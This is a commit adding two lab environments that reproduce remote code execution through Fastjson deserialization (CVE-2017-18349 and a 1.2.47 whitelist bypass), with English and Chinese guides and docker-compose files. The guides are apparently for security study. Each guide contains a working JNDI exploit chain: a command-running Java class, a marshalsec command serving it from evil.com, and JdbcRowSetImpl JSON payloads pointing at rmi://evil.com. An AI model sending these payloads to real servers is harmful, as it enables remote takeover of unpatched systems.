first commit

fastjson/1.2.24-rce/README.md

@@ -0,0 +1,83 @@
+# Fastjson 1.2.24 Deserialization Remote Command Execution (CVE-2017-18349)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Fastjson is a JSON parser developed by Alibaba. During the JSON parsing process, it supports using autoType to instantiate a specific class and call its set/get methods to access properties. By identifying relevant methods in the code, malicious exploitation chains can be constructed.
+
+References:
+
+- <https://www.freebuf.com/vuls/208339.html>
+- <http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/>
+
+## Environment Setup
+
+Execute the following command to start the test server that use Fastjson 1.2.24 as the default JSON parser:
+
+```
+docker compose up -d
+```
+
+After the server is started, visit `http://your-ip:8090` to see a JSON format output.
+
+You can update the server information by POSTing a JSON object to this address:
+
+```
+curl http://your-ip:8090/ -H "Content-Type: application/json" --data '{"name":"hello", "age":20}'
+```
+
+## Vulnerability Reproduction
+
+Since the target environment is Java 8u102, which doesn't have the `com.sun.jndi.rmi.object.trustURLCodebase` restriction, we can use the `com.sun.rowset.JdbcRowSetImpl` exploitation chain to execute commands through JNDI injection.
+
+First, compile and upload the command execution code, such as `http://evil.com/TouchFile.class`:
+
+```java
+// javac TouchFile.java
+import java.lang.Runtime;
+import java.lang.Process;
+
+public class TouchFile {
+    static {
+        try {
+            Runtime rt = Runtime.getRuntime();
+            String[] commands = {"touch", "/tmp/success"};
+            Process pc = rt.exec(commands);
+            pc.waitFor();
+        } catch (Exception e) {
+            // do nothing
+        }
+    }
+}
+```
+
+Then, using the [marshalsec](https://github.com/mbechler/marshalsec) project, start an RMI server listening on port 9999 and specify loading the remote class `TouchFile.class`:
+
+```shell
+java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999
+```
+
+Send the payload to the target server with the RMI address:
+
+```
+POST / HTTP/1.1
+Host: your-ip:8090
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/json
+Content-Length: 160
+
+{
+    "b":{
+        "@type":"com.sun.rowset.JdbcRowSetImpl",
+        "dataSourceName":"rmi://evil.com:9999/TouchFile",
+        "autoCommit":true
+    }
+}
+```
+
+As shown below, the command `touch /tmp/success` has been successfully executed:
+
+![](1.png)

fastjson/1.2.24-rce/README.zh-cn.md

@@ -0,0 +1,81 @@
+# Fastjson 1.2.24 反序列化导致任意命令执行漏洞（CVE-2017-18349）
+
+Fastjson 是阿里巴巴开发的一款 JSON 解析器。在解析 JSON 的过程中，它支持使用 autoType 来实例化某一个具体的类，并调用该类的 set/get 方法来访问属性。通过查找代码中相关的方法，攻击者可以构造出恶意利用链。
+
+参考链接：
+
+- <https://www.freebuf.com/vuls/208339.html>
+- <http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/>
+
+## 环境搭建
+
+执行如下命令启动测试服务器，其使用 Fastjson 1.2.24 作为默认 JSON 解析器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问 `http://your-ip:8090` 即可看到 JSON 格式的输出。
+
+我们可以通过向该地址发送 POST 请求来更新服务端的信息：
+
+```
+curl http://your-ip:8090/ -H "Content-Type: application/json" --data '{"name":"hello", "age":20}'
+```
+
+## 漏洞复现
+
+由于目标环境是 Java 8u102，没有 `com.sun.jndi.rmi.object.trustURLCodebase` 的限制，我们可以使用 `com.sun.rowset.JdbcRowSetImpl` 的利用链，通过 JNDI 注入来执行命令。
+
+首先编译并上传命令执行代码，如 `http://evil.com/TouchFile.class`：
+
+```java
+// javac TouchFile.java
+import java.lang.Runtime;
+import java.lang.Process;
+
+public class TouchFile {
+    static {
+        try {
+            Runtime rt = Runtime.getRuntime();
+            String[] commands = {"touch", "/tmp/success"};
+            Process pc = rt.exec(commands);
+            pc.waitFor();
+        } catch (Exception e) {
+            // do nothing
+        }
+    }
+}
+```
+
+然后使用 [marshalsec](https://github.com/mbechler/marshalsec) 项目启动一个 RMI 服务器，监听 9999 端口，并指定加载远程类 `TouchFile.class`：
+
+```shell
+java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999
+```
+
+向目标服务器发送包含 RMI 地址的 Payload：
+
+```
+POST / HTTP/1.1
+Host: your-ip:8090
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/json
+Content-Length: 160
+
+{
+    "b":{
+        "@type":"com.sun.rowset.JdbcRowSetImpl",
+        "dataSourceName":"rmi://evil.com:9999/TouchFile",
+        "autoCommit":true
+    }
+}
+```
+
+如下图所示，命令 `touch /tmp/success` 已成功执行：
+
+![](1.png)

fastjson/1.2.24-rce/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ web:
+   image: vulhub/fastjson:1.2.24
+   ports:
+    - "8090:8090"

fastjson/1.2.47-rce/README.md

@@ -0,0 +1,75 @@
+# Fastjson 1.2.47 Deserialization Remote Command Execution
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Fastjson is a JSON parser developed by Alibaba, known for its superior performance and widely used in Java projects across various companies. After version 1.2.24, Fastjson added a deserialization whitelist. However, in versions prior to 1.2.48, attackers could bypass the whitelist check using specially crafted JSON strings and successfully execute arbitrary commands.
+
+References:
+
+- <https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955>
+- <https://www.freebuf.com/vuls/208339.html>
+
+## Environment Setup
+
+Execute the following command to start a Spring web project that uses Fastjson 1.2.45 as its default JSON parser:
+
+```shell
+docker compose up -d
+```
+
+After the server starts, visit `http://your-ip:8090` to see a JSON object returned. You can POST new JSON objects by changing the content-type to `application/json`, and the backend will use Fastjson to parse them.
+
+## Vulnerability Reproduction
+
+The target environment is `openjdk:8u102`, which doesn't have the `com.sun.jndi.rmi.object.trustURLCodebase` restriction. We can easily execute commands using RMI.
+
+First, compile and upload the command execution code, such as `http://evil.com/TouchFile.class`:
+
+```java
+// javac TouchFile.java
+import java.lang.Runtime;
+import java.lang.Process;
+
+public class TouchFile {
+    static {
+        try {
+            Runtime rt = Runtime.getRuntime();
+            String[] commands = {"touch", "/tmp/success"};
+            Process pc = rt.exec(commands);
+            pc.waitFor();
+        } catch (Exception e) {
+            // do nothing
+        }
+    }
+}
+```
+
+Then, using the [marshalsec](https://github.com/mbechler/marshalsec) project, start an RMI server listening on port 9999 and specify loading the remote class `TouchFile.class`:
+
+```shell
+java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999
+```
+
+Send the payload to the target server:
+
+```
+{
+    "a":{
+        "@type":"java.lang.Class",
+        "val":"com.sun.rowset.JdbcRowSetImpl"
+    },
+    "b":{
+        "@type":"com.sun.rowset.JdbcRowSetImpl",
+        "dataSourceName":"rmi://evil.com:9999/Exploit",
+        "autoCommit":true
+    }
+}
+```
+
+![](1.png)
+
+As shown below, the command `touch /tmp/success` has been successfully executed:
+
+![](2.png)
+
+For more exploitation methods, please refer to JNDI injection related knowledge.

fastjson/1.2.47-rce/README.zh-cn.md

@@ -0,0 +1,73 @@
+# Fastjson 1.2.47 远程命令执行漏洞
+
+Fastjson 是阿里巴巴公司开源的一款 JSON 解析器，其性能优越，被广泛应用于各大厂商的 Java 项目中。Fastjson 于 1.2.24 版本后增加了反序列化白名单，而在 1.2.48 以前的版本中，攻击者可以利用特殊构造的 JSON 字符串绕过白名单检测，成功执行任意命令。
+
+参考链接：
+
+- <https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955>
+- <https://www.freebuf.com/vuls/208339.html>
+
+## 环境搭建
+
+执行如下命令启动一个 Spring Web 项目，其中使用 Fastjson 作为默认 JSON 解析器：
+
+```shell
+docker compose up -d
+```
+
+环境启动后，访问 `http://your-ip:8090` 即可看到一个 JSON 对象被返回。我们将 Content-Type 修改为 `application/json` 后可向其 POST 新的 JSON 对象，后端会使用 Fastjson 进行解析。
+
+## 漏洞复现
+
+目标环境是 `openjdk:8u102`，这个版本没有 `com.sun.jndi.rmi.object.trustURLCodebase` 的限制，我们可以简单利用 RMI 进行命令执行。
+
+首先编译并上传命令执行代码，如 `http://evil.com/TouchFile.class`：
+
+```java
+// javac TouchFile.java
+import java.lang.Runtime;
+import java.lang.Process;
+
+public class TouchFile {
+    static {
+        try {
+            Runtime rt = Runtime.getRuntime();
+            String[] commands = {"touch", "/tmp/success"};
+            Process pc = rt.exec(commands);
+            pc.waitFor();
+        } catch (Exception e) {
+            // do nothing
+        }
+    }
+}
+```
+
+然后使用 [marshalsec](https://github.com/mbechler/marshalsec) 项目启动一个 RMI 服务器，监听 9999 端口，并指定加载远程类 `TouchFile.class`：
+
+```shell
+java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999
+```
+
+向目标服务器发送 Payload：
+
+```
+{
+    "a":{
+        "@type":"java.lang.Class",
+        "val":"com.sun.rowset.JdbcRowSetImpl"
+    },
+    "b":{
+        "@type":"com.sun.rowset.JdbcRowSetImpl",
+        "dataSourceName":"rmi://evil.com:9999/Exploit",
+        "autoCommit":true
+    }
+}
+```
+
+![](1.png)
+
+如下图所示，命令 `touch /tmp/success` 已成功执行：
+
+![](2.png)
+
+更多利用方法请参考 JNDI 注入相关知识。

fastjson/1.2.47-rce/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ web:
+   image: vulhub/fastjson:1.2.45
+   ports:
+    - "8090:8090"

fastjson/vuln/README.md

@@ -0,0 +1,3 @@
+# Alert
+
+This file is move to [Here](../1.2.24-rce/)